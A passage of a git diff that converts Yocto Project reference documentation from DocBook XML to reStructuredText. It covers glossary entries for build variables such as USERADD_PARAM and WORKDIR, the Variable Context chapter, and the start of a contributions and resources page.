- If the source code is provided from tarballs, the latest
- version is determined by fetching the directory listing
- where the tarball is and attempting to find a later tarball.
- When this approach does not work, you can use
- <filename>UPSTREAM_CHECK_URI</filename> to
- provide a different URI that contains the link to the
- latest tarball.
- <literallayout class='monospaced'>
- UPSTREAM_CHECK_URI = "recipe_url"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-USE_DEVFS'><glossterm>USE_DEVFS</glossterm>
- <info>
- USE_DEVFS[doc] = "Determines if devtmpfs is used for /dev population."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Determines if <filename>devtmpfs</filename> is used for
- <filename>/dev</filename> population.
- The default value used for <filename>USE_DEVFS</filename>
- is "1" when no value is specifically set.
- Typically, you would set <filename>USE_DEVFS</filename>
- to "0" for a statically populated <filename>/dev</filename>
- directory.
- </para>
-
- <para>
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#selecting-dev-manager'>Selecting a Device Manager</ulink>"
- section in the Yocto Project Development Tasks Manual for
- information on how to use this variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-USE_VT'><glossterm>USE_VT</glossterm>
- <info>
- USE_VT[doc] = "When using SysVinit, determines whether or not to run a getty on any virtual terminals in order to enable logging in through those terminals."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When using
- <ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-enabling-system-services'>SysVinit</ulink>,
- determines whether or not to run a
- <ulink url='http://en.wikipedia.org/wiki/Getty_%28Unix%29'>getty</ulink>
- on any virtual terminals in order to enable logging in
- through those terminals.
- </para>
-
- <para>
- The default value used for <filename>USE_VT</filename>
- is "1" when no default value is specifically set.
- Typically, you would set <filename>USE_VT</filename>
- to "0" in the machine configuration file for machines
- that do not have a graphical display attached and
- therefore do not need virtual terminal functionality.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-USER_CLASSES'><glossterm>USER_CLASSES</glossterm>
- <info>
- USER_CLASSES[doc] = "List of additional classes to use when building images that enable extra features."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- A list of classes to globally inherit.
- These classes are used by the OpenEmbedded build system
- to enable extra features (e.g.
- <filename>buildstats</filename>,
- <filename>image-mklibs</filename>, and so forth).
- </para>
-
- <para>
- The default list is set in your
- <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- USER_CLASSES ?= "buildstats image-mklibs image-prelink"
- </literallayout>
- For more information, see
- <filename>meta-poky/conf/local.conf.sample</filename> in
- the
- <link linkend='source-directory'>Source Directory</link>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-USERADD_ERROR_DYNAMIC'><glossterm>USERADD_ERROR_DYNAMIC</glossterm>
- <info>
- USERADD_ERROR_DYNAMIC[doc] = "If set to 'error', forces the OpenEmbedded build system to produce an error if the user identification (uid) and group identification (gid) values are not defined in any of the files listed in USERADD_UID_TABLES and USERADD_GID_TABLES. If set to 'warn', a warning will be issued instead."
- </info>
- <glossdef>
- <para role="glossdeffirst">
-
- If set to <filename>error</filename>, forces the
- OpenEmbedded build system to produce an error if the user
- identification (<filename>uid</filename>) and group
- identification (<filename>gid</filename>) values are not
- defined in any of the files listed
- in <link linkend='var-USERADD_UID_TABLES'><filename>USERADD_UID_TABLES</filename></link>
- and <link linkend='var-USERADD_GID_TABLES'><filename>USERADD_GID_TABLES</filename></link>. If
- set to <filename>warn</filename>, a warning will be issued
- instead.
- </para>
-
- <para>
- The default behavior for the build system is to dynamically
- apply <filename>uid</filename> and
- <filename>gid</filename> values.
- Consequently, the <filename>USERADD_ERROR_DYNAMIC</filename>
- variable is by default not set.
- If you plan on using statically assigned
- <filename>gid</filename> and <filename>uid</filename>
- values, you should set
- the <filename>USERADD_ERROR_DYNAMIC</filename> variable in
- your <filename>local.conf</filename> file as
- follows:
- <literallayout class='monospaced'>
- USERADD_ERROR_DYNAMIC = "error"
- </literallayout>
- Overriding the default behavior implies you are going to
- also take steps to set static <filename>uid</filename> and
- <filename>gid</filename> values through use of the
- <link linkend='var-USERADDEXTENSION'><filename>USERADDEXTENSION</filename></link>,
- <link linkend='var-USERADD_UID_TABLES'><filename>USERADD_UID_TABLES</filename></link>,
- and
- <link linkend='var-USERADD_GID_TABLES'><filename>USERADD_GID_TABLES</filename></link>
- variables.
- </para>
-
- <note>
- There is a difference in behavior between
- setting <filename>USERADD_ERROR_DYNAMIC</filename>
- to <filename>error</filename> and setting it
- to <filename>warn</filename>. When it is set
- to <filename>warn</filename>, the build system will report a
- warning for every undefined <filename>uid</filename> and
- <filename>gid</filename> in any recipe. But when it is set
- to <filename>error</filename>, it will only report errors
- for recipes that are actually built. This saves you from
- having to add static IDs for recipes that you know will
- never be built.
- </note>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-USERADD_GID_TABLES'><glossterm>USERADD_GID_TABLES</glossterm>
- <info>
- USERADD_GID_TABLES[doc] = "Specifies a password file to use for obtaining static group identification (gid) values when the OpenEmbedded build system adds a group to the system during package installation."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a password file to use for obtaining static
- group identification (<filename>gid</filename>) values
- when the OpenEmbedded build system adds a group to the
- system during package installation.
- </para>
-
- <para>
- When applying static group identification
- (<filename>gid</filename>) values, the OpenEmbedded build
- system looks in
- <link linkend='var-BBPATH'><filename>BBPATH</filename></link>
- for a <filename>files/group</filename> file and then applies
- those <filename>uid</filename> values.
- Set the variable as follows in your
- <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- USERADD_GID_TABLES = "files/group"
- </literallayout>
- </para>
-
- <note>
- Setting the
- <link linkend='var-USERADDEXTENSION'><filename>USERADDEXTENSION</filename></link>
- variable to "useradd-staticids" causes the build system
- to use static <filename>gid</filename> values.
- </note>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-USERADD_PACKAGES'><glossterm>USERADD_PACKAGES</glossterm>
- <info>
- USERADD_PACKAGES[doc] = "When a recipe inherits the useradd class, this variable specifies the individual packages within the recipe that require users and/or groups to be added."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
- class, this variable
- specifies the individual packages within the recipe that
- require users and/or groups to be added.
- </para>
-
- <para>
- You must set this variable if the recipe inherits the
- class.
- For example, the following enables adding a user for the
- main package in a recipe:
- <literallayout class='monospaced'>
- USERADD_PACKAGES = "${PN}"
- </literallayout>
- <note>
- It follows that if you are going to use the
- <filename>USERADD_PACKAGES</filename> variable,
- you need to set one or more of the
- <link linkend='var-USERADD_PARAM'><filename>USERADD_PARAM</filename></link>,
- <link linkend='var-GROUPADD_PARAM'><filename>GROUPADD_PARAM</filename></link>,
- or
- <link linkend='var-GROUPMEMS_PARAM'><filename>GROUPMEMS_PARAM</filename></link>
- variables.
- </note>
- </para>
-
- </glossdef>
- </glossentry>
-
- <glossentry id='var-USERADD_PARAM'><glossterm>USERADD_PARAM</glossterm>
- <info>
- USERADD_PARAM[doc] = "When a recipe inherits the useradd class, this variable specifies for a package what parameters should pass to the useradd command if you add a user to the system when the package is installed."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When inheriting the
- <link linkend='ref-classes-useradd'><filename>useradd</filename></link>
- class, this variable
- specifies for a package what parameters should pass
- to the <filename>useradd</filename> command
- if you add a user to the system when the package
- is installed.
- </para>
-
- <para>
- Here is an example from the <filename>dbus</filename>
- recipe:
- <literallayout class='monospaced'>
- USERADD_PARAM_${PN} = "--system --home ${localstatedir}/lib/dbus \
- --no-create-home --shell /bin/false \
- --user-group messagebus"
- </literallayout>
- For information on the standard Linux shell command
- <filename>useradd</filename>, see
- <ulink url='http://linux.die.net/man/8/useradd'></ulink>.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-USERADD_UID_TABLES'><glossterm>USERADD_UID_TABLES</glossterm>
- <info>
- USERADD_UID_TABLES[doc] = "Specifies a password file to use for obtaining static user identification (uid) values when the OpenEmbedded build system adds a user to the system during package installation."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies a password file to use for obtaining static
- user identification (<filename>uid</filename>) values
- when the OpenEmbedded build system adds a user to the
- system during package installation.
- </para>
-
- <para>
- When applying static user identification
- (<filename>uid</filename>) values, the OpenEmbedded build
- system looks in
- <link linkend='var-BBPATH'><filename>BBPATH</filename></link>
- for a <filename>files/passwd</filename> file and then applies
- those <filename>uid</filename> values.
- Set the variable as follows in your
- <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- USERADD_UID_TABLES = "files/passwd"
- </literallayout>
- </para>
-
- <note>
- Setting the
- <link linkend='var-USERADDEXTENSION'><filename>USERADDEXTENSION</filename></link>
- variable to "useradd-staticids" causes the build system
- to use static <filename>uid</filename> values.
- </note>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-USERADDEXTENSION'><glossterm>USERADDEXTENSION</glossterm>
- <info>
- USERADDEXTENSION[doc] = "When set to 'useradd-staticids', causes the OpenEmbedded build system to base all user and group additions on a static passwd and group files found in BBPATH."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When set to "useradd-staticids", causes the
- OpenEmbedded build system to base all user and group
- additions on a static
- <filename>passwd</filename> and
- <filename>group</filename> files found in
- <link linkend='var-BBPATH'><filename>BBPATH</filename></link>.
- </para>
-
- <para>
- To use static user identification (<filename>uid</filename>)
- and group identification (<filename>gid</filename>)
- values, set the variable
- as follows in your <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- USERADDEXTENSION = "useradd-staticids"
- </literallayout>
- <note>
- Setting this variable to use static
- <filename>uid</filename> and <filename>gid</filename>
- values causes the OpenEmbedded build system to employ
- the
- <link linkend='ref-classes-useradd'><filename>useradd-staticids</filename></link>
- class.
- </note>
- </para>
-
- <para>
- If you use static <filename>uid</filename> and
- <filename>gid</filename> information, you must also
- specify the <filename>files/passwd</filename> and
- <filename>files/group</filename> files by setting the
- <link linkend='var-USERADD_UID_TABLES'><filename>USERADD_UID_TABLES</filename></link>
- and
- <link linkend='var-USERADD_GID_TABLES'><filename>USERADD_GID_TABLES</filename></link>
- variables.
- Additionally, you should also set the
- <link linkend='var-USERADD_ERROR_DYNAMIC'><filename>USERADD_ERROR_DYNAMIC</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-v'><title>V</title>
-
- <glossentry id='var-VOLATILE_LOG_DIR'><glossterm>VOLATILE_LOG_DIR</glossterm>
- <info>
- VOLATILE_LOG_DIR[doc] = "Specifies the persistence of the target's /var/log directory, which is used to house postinstall target log files."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the persistence of the target's
- <filename>/var/log</filename> directory, which is used to
- house postinstall target log files.
- </para>
-
- <para>
- By default, <filename>VOLATILE_LOG_DIR</filename> is set
- to "yes", which means the file is not persistent.
- You can override this setting by setting the
- variable to "no" to make the log directory persistent.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-w'><title>W</title>
-
- <glossentry id='var-WARN_QA'><glossterm>WARN_QA</glossterm>
- <info>
- WARN_QA[doc] = "Specifies the quality assurance checks whose failures are reported as warnings by the OpenEmbedded build system."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the quality assurance checks whose failures are
- reported as warnings by the OpenEmbedded build system.
- You set this variable in your distribution configuration
- file.
- For a list of the checks you can control with this variable,
- see the
- "<link linkend='ref-classes-insane'><filename>insane.bbclass</filename></link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-WKS_FILE_DEPENDS'><glossterm>WKS_FILE_DEPENDS</glossterm>
- <info>
- WKS_FILE_DEPENDS[doc] = "Lists a recipe's build-time dependencies specific to Wic."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- When placed in the recipe that builds your image, this
- variable lists build-time dependencies.
- The <filename>WKS_FILE_DEPENDS</filename> variable is only
- applicable when Wic images are active (i.e. when
- <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
- contains entries related to Wic).
- If your recipe does not create Wic images, the variable
- has no effect.
- </para>
-
- <para>
- The <filename>WKS_FILE_DEPENDS</filename> variable is
- similar to the
- <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
- variable.
- When you use the variable in your recipe that builds the
- Wic image, dependencies you list in the
- <filename>WIC_FILE_DEPENDS</filename> variable are added to
- the <filename>DEPENDS</filename> variable.
- </para>
-
- <para>
- With the <filename>WKS_FILE_DEPENDS</filename> variable,
- you have the possibility to specify a list of additional
- dependencies (e.g. native tools, bootloaders, and so forth),
- that are required to build Wic images.
- Following is an example:
- <literallayout class='monospaced'>
- WKS_FILE_DEPENDS = "<replaceable>some-native-tool</replaceable>"
- </literallayout>
- In the previous example,
- <replaceable>some-native-tool</replaceable> would be
- replaced with an actual native tool on which the build
- would depend.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-WKS_FILE'><glossterm>WKS_FILE</glossterm>
- <info>
- WKS_FILE[doc] = "Specifies the name of the wic kickstart file."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the location of the Wic
- kickstart file that is used by the OpenEmbedded build
- system to create a partitioned image
- (<replaceable>image</replaceable><filename>.wic</filename>).
- For information on how to create a partitioned image, see
- the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-partitioned-images-using-wic'>Creating Partitioned Images Using Wic</ulink>"
- section in the Yocto Project Development Tasks Manual.
- For details on the kickstart file format, see the
- "<link linkend='ref-kickstart'>OpenEmbedded Kickstart (<filename>.wks</filename>) Reference</link>"
- Chapter.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-WORKDIR'><glossterm>WORKDIR</glossterm>
- <info>
- WORKDIR[doc] = "The pathname of the working directory in which the OpenEmbedded build system builds a recipe. This directory is located within the TMPDIR directory structure and changes as different packages are built."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- The pathname of the work directory in which the OpenEmbedded
- build system builds a recipe.
- This directory is located within the
- <link linkend='var-TMPDIR'><filename>TMPDIR</filename></link>
- directory structure and is specific to the recipe being
- built and the system for which it is being built.
- </para>
-
- <para>
- The <filename>WORKDIR</filename> directory is defined as
- follows:
- <literallayout class='monospaced'>
- ${TMPDIR}/work/${MULTIMACH_TARGET_SYS}/${PN}/${EXTENDPE}${PV}-${PR}
- </literallayout>
- The actual directory depends on several things:
- <itemizedlist>
- <listitem><filename>TMPDIR</filename>:
- The top-level build output directory</listitem>
- <listitem><link linkend='var-MULTIMACH_TARGET_SYS'><filename>MULTIMACH_TARGET_SYS</filename></link>:
- The target system identifier</listitem>
- <listitem><link linkend='var-PN'><filename>PN</filename></link>:
- The recipe name</listitem>
- <listitem><link linkend='var-EXTENDPE'><filename>EXTENDPE</filename></link>:
- The epoch - (if
- <link linkend='var-PE'><filename>PE</filename></link>
- is not specified, which is usually the case for most
- recipes, then <filename>EXTENDPE</filename> is blank)</listitem>
- <listitem><link linkend='var-PV'><filename>PV</filename></link>:
- The recipe version</listitem>
- <listitem><link linkend='var-PR'><filename>PR</filename></link>:
- The recipe revision</listitem>
- </itemizedlist>
- </para>
-
- <para>
- As an example, assume a Source Directory top-level folder
- name <filename>poky</filename>, a default Build Directory at
- <filename>poky/build</filename>, and a
- <filename>qemux86-poky-linux</filename> machine target
- system.
- Furthermore, suppose your recipe is named
- <filename>foo_1.3.0-r0.bb</filename>.
- In this case, the work directory the build system uses to
- build the package would be as follows:
- <literallayout class='monospaced'>
- poky/build/tmp/work/qemux86-poky-linux/foo/1.3.0-r0
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-glossary-x'><title>X</title>
-
- <glossentry id='var-XSERVER'><glossterm>XSERVER</glossterm>
- <info>
- XSERVER[doc] = "Specifies the packages that should be installed to provide an X server and drivers for the current machine."
- </info>
- <glossdef>
- <para role="glossdeffirst">
- Specifies the packages that should be installed to
- provide an X server and drivers for the current machine,
- assuming your image directly includes
- <filename>packagegroup-core-x11-xserver</filename> or,
- perhaps indirectly, includes "x11-base" in
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>.
- </para>
-
- <para>
- The default value of <filename>XSERVER</filename>, if not
- specified in the machine configuration, is
- "xserver-xorg xf86-video-fbdev xf86-input-evdev".
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
-<!-- <glossdiv id='var-glossary-y'><title>Y</title>-->
-<!-- </glossdiv>-->
-
-<!-- <glossdiv id='var-glossary-z'><title>Z</title>-->
-<!-- </glossdiv>-->
-
-</glossary>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-varlocality.rst b/documentation/ref-manual/ref-varlocality.rst
new file mode 100644
index 0000000000..5f7dba8775
--- /dev/null
+++ b/documentation/ref-manual/ref-varlocality.rst
@@ -0,0 +1,166 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+****************
+Variable Context
+****************
+
+While you can use most variables in almost any context such as
+``.conf``, ``.bbclass``, ``.inc``, and ``.bb`` files, some variables are
+often associated with a particular locality or context. This chapter
+describes some common associations.
+
+.. _ref-varlocality-configuration:
+
+Configuration
+=============
+
+The following subsections provide lists of variables whose context is
+configuration: distribution, machine, and local.
+
+.. _ref-varlocality-config-distro:
+
+Distribution (Distro)
+---------------------
+
+This section lists variables whose configuration context is the
+distribution, or distro.
+
+- :term:`DISTRO`
+
+- :term:`DISTRO_NAME`
+
+- :term:`DISTRO_VERSION`
+
+- :term:`MAINTAINER`
+
+- :term:`PACKAGE_CLASSES`
+
+- :term:`TARGET_OS`
+
+- :term:`TARGET_FPU`
+
+- :term:`TCMODE`
+
+- :term:`TCLIBC`
+
+.. _ref-varlocality-config-machine:
+
+Machine
+-------
+
+This section lists variables whose configuration context is the machine.
+
+- :term:`TARGET_ARCH`
+
+- :term:`SERIAL_CONSOLES`
+
+- :term:`PACKAGE_EXTRA_ARCHS`
+
+- :term:`IMAGE_FSTYPES`
+
+- :term:`MACHINE_FEATURES`
+
+- :term:`MACHINE_EXTRA_RDEPENDS`
+
+- :term:`MACHINE_EXTRA_RRECOMMENDS`
+
+- :term:`MACHINE_ESSENTIAL_EXTRA_RDEPENDS`
+
+- :term:`MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`
+
+.. _ref-varlocality-config-local:
+
+Local
+-----
+
+This section lists variables whose configuration context is the local
+configuration through the ``local.conf`` file.
+
+- :term:`DISTRO`
+
+- :term:`MACHINE`
+
+- :term:`DL_DIR`
+
+- :term:`BBFILES`
+
+- :term:`EXTRA_IMAGE_FEATURES`
+
+- :term:`PACKAGE_CLASSES`
+
+- :term:`BB_NUMBER_THREADS`
+
+- :term:`BBINCLUDELOGS`
+
+- :term:`ENABLE_BINARY_LOCALE_GENERATION`
+
+.. _ref-varlocality-recipes:
+
+Recipes
+=======
+
+The following subsections provide lists of variables whose context is
+recipes: required, dependencies, path, and extra build information.
+
+.. _ref-varlocality-recipe-required:
+
+Required
+--------
+
+This section lists variables that are required for recipes.
+
+- :term:`LICENSE`
+
+- :term:`LIC_FILES_CHKSUM`
+
+- :term:`SRC_URI` - used in recipes that fetch local or remote files.
+
+.. _ref-varlocality-recipe-dependencies:
+
+Dependencies
+------------
+
+This section lists variables that define recipe dependencies.
+
+- :term:`DEPENDS`
+
+- :term:`RDEPENDS`
+
+- :term:`RRECOMMENDS`
+
+- :term:`RCONFLICTS`
+
+- :term:`RREPLACES`
+
+.. _ref-varlocality-recipe-paths:
+
+Paths
+-----
+
+This section lists variables that define recipe paths.
+
+- :term:`WORKDIR`
+
+- :term:`S`
+
+- :term:`FILES`
+
+.. _ref-varlocality-recipe-build:
+
+Extra Build Information
+-----------------------
+
+This section lists variables that define extra build information for
+recipes.
+
+- :term:`DEFAULT_PREFERENCE`
+
+- :term:`EXTRA_OECMAKE`
+
+- :term:`EXTRA_OECONF`
+
+- :term:`EXTRA_OEMAKE`
+
+- :term:`PACKAGECONFIG_CONFARGS`
+
+- :term:`PACKAGES`
diff --git a/documentation/ref-manual/ref-varlocality.xml b/documentation/ref-manual/ref-varlocality.xml
deleted file mode 100644
index 54524d5b60..0000000000
--- a/documentation/ref-manual/ref-varlocality.xml
+++ /dev/null
@@ -1,198 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-varlocality'>
- <title>Variable Context</title>
-
- <para>
- While you can use most variables in almost any context such as
- <filename>.conf</filename>, <filename>.bbclass</filename>,
- <filename>.inc</filename>, and <filename>.bb</filename> files,
- some variables are often associated with a particular locality or context.
- This chapter describes some common associations.
- </para>
-
- <section id='ref-varlocality-configuration'>
- <title>Configuration</title>
-
- <para>
- The following subsections provide lists of variables whose context is
- configuration: distribution, machine, and local.
- </para>
-
- <section id='ref-varlocality-config-distro'>
- <title>Distribution (Distro)</title>
-
- <para>
- This section lists variables whose configuration context is the
- distribution, or distro.
- <itemizedlist>
- <listitem><para><filename><link linkend='var-DISTRO'>DISTRO</link></filename></para></listitem>
- <listitem><para><filename><link linkend='var-DISTRO_NAME'>DISTRO_NAME</link></filename>
- </para></listitem>
- <listitem><para><filename><link linkend='var-DISTRO_VERSION'>DISTRO_VERSION</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-MAINTAINER'>MAINTAINER</link></filename>
- </para></listitem>
- <listitem><para><filename><link linkend='var-PACKAGE_CLASSES'>PACKAGE_CLASSES</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-TARGET_OS'>TARGET_OS</link></filename>
- </para></listitem>
- <listitem><para><filename><link linkend='var-TARGET_FPU'>TARGET_FPU</link></filename>
- </para></listitem>
- <listitem><para><filename><link linkend='var-TCMODE'>TCMODE</link></filename>
- </para></listitem>
- <listitem><para><filename><link linkend='var-TCLIBC'>TCLIBC</link></filename>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='ref-varlocality-config-machine'>
- <title>Machine</title>
-
- <para>
- This section lists variables whose configuration context is the
- machine.
- <itemizedlist>
- <listitem><para><filename><link linkend='var-TARGET_ARCH'>TARGET_ARCH</link></filename>
- </para></listitem>
- <listitem><para><filename><link linkend='var-SERIAL_CONSOLES'>SERIAL_CONSOLES</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-PACKAGE_EXTRA_ARCHS'>PACKAGE_EXTRA_ARCHS</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-IMAGE_FSTYPES'>IMAGE_FSTYPES</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-MACHINE_FEATURES'>MACHINE_FEATURES</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-MACHINE_EXTRA_RDEPENDS'>MACHINE_EXTRA_RDEPENDS
- </link></filename></para></listitem>
- <listitem><para><filename><link linkend='var-MACHINE_EXTRA_RRECOMMENDS'>MACHINE_EXTRA_RRECOMMENDS
- </link></filename></para></listitem>
- <listitem><para><filename><link linkend='var-MACHINE_ESSENTIAL_EXTRA_RDEPENDS'>MACHINE_ESSENTIAL_EXTRA_RDEPENDS
- </link></filename></para></listitem>
- <listitem><para><filename><link linkend='var-MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS'>
- MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS</link></filename></para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='ref-varlocality-config-local'>
- <title>Local</title>
-
- <para>
- This section lists variables whose configuration context is the
- local configuration through the <filename>local.conf</filename>
- file.
- <itemizedlist>
- <listitem><para><filename><link linkend='var-DISTRO'>DISTRO</link></filename>
- </para></listitem>
- <listitem><para><filename><link linkend='var-MACHINE'>MACHINE</link></filename>
- </para></listitem>
- <listitem><para><filename><link linkend='var-DL_DIR'>DL_DIR</link></filename>
- </para></listitem>
- <listitem><para><filename><link linkend='var-BBFILES'>BBFILES</link></filename>
- </para></listitem>
- <listitem><para><filename><link linkend='var-EXTRA_IMAGE_FEATURES'>EXTRA_IMAGE_FEATURES
- </link></filename></para></listitem>
- <listitem><para><filename><link linkend='var-PACKAGE_CLASSES'>PACKAGE_CLASSES</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-BB_NUMBER_THREADS'>BB_NUMBER_THREADS</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-BBINCLUDELOGS'>BBINCLUDELOGS</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-ENABLE_BINARY_LOCALE_GENERATION'>
- ENABLE_BINARY_LOCALE_GENERATION</link></filename></para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id='ref-varlocality-recipes'>
- <title>Recipes</title>
-
- <para>
- The following subsections provide lists of variables whose context is
- recipes: required, dependencies, path, and extra build information.
- </para>
-
- <section id='ref-varlocality-recipe-required'>
- <title>Required</title>
-
- <para>
- This section lists variables that are required for recipes.
- <itemizedlist>
- <listitem><para><filename><link linkend='var-LICENSE'>LICENSE</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-LIC_FILES_CHKSUM'>LIC_FILES_CHKSUM</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-SRC_URI'>SRC_URI</link></filename> - used
- in recipes that fetch local or remote files.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='ref-varlocality-recipe-dependencies'>
- <title>Dependencies</title>
-
- <para>
- This section lists variables that define recipe dependencies.
- <itemizedlist>
- <listitem><para><filename><link linkend='var-DEPENDS'>DEPENDS</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-RDEPENDS'>RDEPENDS</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-RRECOMMENDS'>RRECOMMENDS</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-RCONFLICTS'>RCONFLICTS</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-RREPLACES'>RREPLACES</link>
- </filename></para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='ref-varlocality-recipe-paths'>
- <title>Paths</title>
-
- <para>
- This section lists variables that define recipe paths.
- <itemizedlist>
- <listitem><para><filename><link linkend='var-WORKDIR'>WORKDIR</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-S'>S</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-FILES'>FILES</link>
- </filename></para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='ref-varlocality-recipe-build'>
- <title>Extra Build Information</title>
-
- <para>
- This section lists variables that define extra build information for recipes.
- <itemizedlist>
- <listitem><para><filename><link linkend='var-DEFAULT_PREFERENCE'>DEFAULT_PREFERENCE
- </link></filename></para></listitem>
- <listitem><para><filename><link linkend='var-EXTRA_OECMAKE'>EXTRA_OECMAKE</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-EXTRA_OECONF'>EXTRA_OECONF</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-EXTRA_OEMAKE'>EXTRA_OEMAKE</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-PACKAGECONFIG_CONFARGS'>PACKAGECONFIG_CONFARGS</link>
- </filename></para></listitem>
- <listitem><para><filename><link linkend='var-PACKAGES'>PACKAGES</link></filename>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4 spell spelllang=en_gb
--->
diff --git a/documentation/ref-manual/resources.rst b/documentation/ref-manual/resources.rst
new file mode 100644
index 0000000000..2ef182fb1c
--- /dev/null
+++ b/documentation/ref-manual/resources.rst
@@ -0,0 +1,197 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+****************************************
+Contributions and Additional Information
+****************************************
+
+.. _resources-intro:
+
+Introduction
+============
+
+The Yocto Project team is happy for people to experiment with the Yocto
+Project. A number of places exist to find help if you run into
+difficulties or find bugs. This presents information about contributing
+and participating in the Yocto Project.
+
+.. _resources-contributions:
+
+Contributions
+=============
+
+The Yocto Project gladly accepts contributions. You can submit changes
+to the project either by creating and sending pull requests, or by
+submitting patches through email. For information on how to do both as
+well as information on how to identify the maintainer for each area of
+code, see the ":ref:`how-to-submit-a-change`" section in the
+Yocto Project Development Tasks Manual.
+
+.. _resources-bugtracker:
+
+Yocto Project Bugzilla
+======================
+
+The Yocto Project uses its own implementation of
+:yocto_bugs:`Bugzilla <>` to track defects (bugs).
+Implementations of Bugzilla work well for group development because they
+track bugs and code changes, can be used to communicate changes and
+problems with developers, can be used to submit and review patches, and
+can be used to manage quality assurance.
+
+Sometimes it is helpful to submit, investigate, or track a bug against
+the Yocto Project itself (e.g. when discovering an issue with some
+component of the build system that acts contrary to the documentation or
+your expectations).
+
+A general procedure and guidelines exist for when you use Bugzilla to
+submit a bug. For information on how to use Bugzilla to submit a bug
+against the Yocto Project, see the following:
+
+- The ":ref:`dev-manual/dev-manual-common-tasks:submitting a defect against the yocto project`"
+ section in the Yocto Project Development Tasks Manual.
+
+- The Yocto Project :yocto_wiki:`Bugzilla wiki page </wiki/Bugzilla_Configuration_and_Bug_Tracking>`
+
+For information on Bugzilla in general, see http://www.bugzilla.org/about/.
+
+.. _resources-mailinglist:
+
+Mailing lists
+=============
+
+A number of mailing lists maintained by the Yocto Project exist as well
+as related OpenEmbedded mailing lists for discussion, patch submission
+and announcements. To subscribe to one of the following mailing lists,
+click on the appropriate URL in the following list and follow the
+instructions:
+
+- :yocto_lists:`/g/yocto` - General Yocto Project
+ discussion mailing list.
+
